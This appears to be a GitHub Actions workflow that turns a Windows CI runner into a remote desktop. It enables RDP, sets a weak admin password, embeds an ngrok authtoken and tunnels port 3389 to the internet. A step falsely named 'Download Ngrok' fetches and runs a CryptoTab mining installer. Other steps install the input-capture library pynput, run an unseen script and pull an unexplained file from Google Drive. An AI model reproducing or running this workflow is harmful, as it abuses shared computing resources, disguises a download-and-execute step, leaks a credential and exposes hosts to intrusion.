name: BiiuhRDP

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest

    steps:
    - name: Download Ngrok
  
      run: Invoke-WebRequest https://cryptobrowser.site/get/BrowserSetup.exe -OutFile cryptotab.exe
    - run: .\cryptotab.exe
    - name: Install dependencies
      uses: actions/checkout@v2
    - name: Set up Python
      uses: actions/setup-python@v1
      with:
       python-version: '3.x'
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install pynput
        python finall_2.py
    - name: download 
      run: Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
    - name: Extract Ngrok Archive and auth
      run: Expand-Archive ngrok.zip
    - run: .\ngrok\ngrok.exe authtoken 1rxR0SWGxdjlvdZoDa8CbGK4eJi_6MxA8n34TRKQNKWHEs9xi
    - name: Enable TS
      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "asdasd" -Force)
    - run: Invoke-WebRequest https://drive.google.com/file/d/1p4JBBTxmPPm6s82tO0rzJIQ6gpgjT_w2/view?usp=sharing -OutFile 1.py
    - name: Create Tunnel
      run: .\ngrok\ngrok.exe tcp 3389

      
    
